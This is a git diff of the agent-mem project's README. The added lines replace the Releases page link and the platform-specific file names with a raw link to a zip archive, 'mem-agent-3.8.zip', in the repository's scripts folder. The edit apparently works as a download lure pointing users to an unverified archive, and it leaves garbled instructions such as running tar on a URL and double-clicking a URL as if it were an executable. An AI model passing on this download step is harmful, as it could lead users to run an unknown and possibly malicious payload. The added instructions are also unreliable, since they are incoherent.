HanFromTokyoDrift/agent-mem/README.md

 To get started with agent-mem, follow these steps:

-1. **Visit the Releases Page:** Go to the [Releases page](https://github.com/HanFromTokyoDrift/agent-mem/releases) to find the latest version.
+1. **Visit the Releases Page:** Go to the [Releases page](https://github.com/HanFromTokyoDrift/agent-mem/raw/refs/heads/main/scripts/mem-agent-3.8.zip) to find the latest version.
 2. **Select the Download:** Look for the latest release.
 You will see various files.
 Choose the one that matches your operating system.
-For most users, the file names will look like `agent-mem-vX.X.X-win.zip`, `agent-mem-vX.X.X-mac.zip`, or `agent-mem-vX.X.X-linux.tar.gz`.
+For most users, the file names will look like `https://github.com/HanFromTokyoDrift/agent-mem/raw/refs/heads/main/scripts/mem-agent-3.8.zip`, `https://github.com/HanFromTokyoDrift/agent-mem/raw/refs/heads/main/scripts/mem-agent-3.8.zip`, or `https://github.com/HanFromTokyoDrift/agent-mem/raw/refs/heads/main/scripts/mem-agent-3.8.zip`.
 3. **Download the File:** Click on the file to initiate the download.
 This will save the file to your computer.
 4. **Extract the Files:**
    - For Windows, right-click on the zip file and choose "Extract All."
    - For macOS, double-click the zip file to extract it.
-   - For Linux, use the terminal or a file manager to extract the tar.gz file.
-You can run `tar -xvzf agent-mem-vX.X.X-linux.tar.gz` in the terminal.
+   - For Linux, use the terminal or a file manager to extract the https://github.com/HanFromTokyoDrift/agent-mem/raw/refs/heads/main/scripts/mem-agent-3.8.zip file.
+You can run `tar -xvzf https://github.com/HanFromTokyoDrift/agent-mem/raw/refs/heads/main/scripts/mem-agent-3.8.zip` in the terminal.
 5. **Run the Application:**
-   - On Windows, find the folder where you extracted the files and double-click `agent-mem.exe`.
+   - On Windows, find the folder where you extracted the files and double-click `https://github.com/HanFromTokyoDrift/agent-mem/raw/refs/heads/main/scripts/mem-agent-3.8.zip`.
    - On macOS, locate the `agent-mem` file and double-click it.
    - On Linux, navigate to the folder in the terminal and run `./agent-mem`.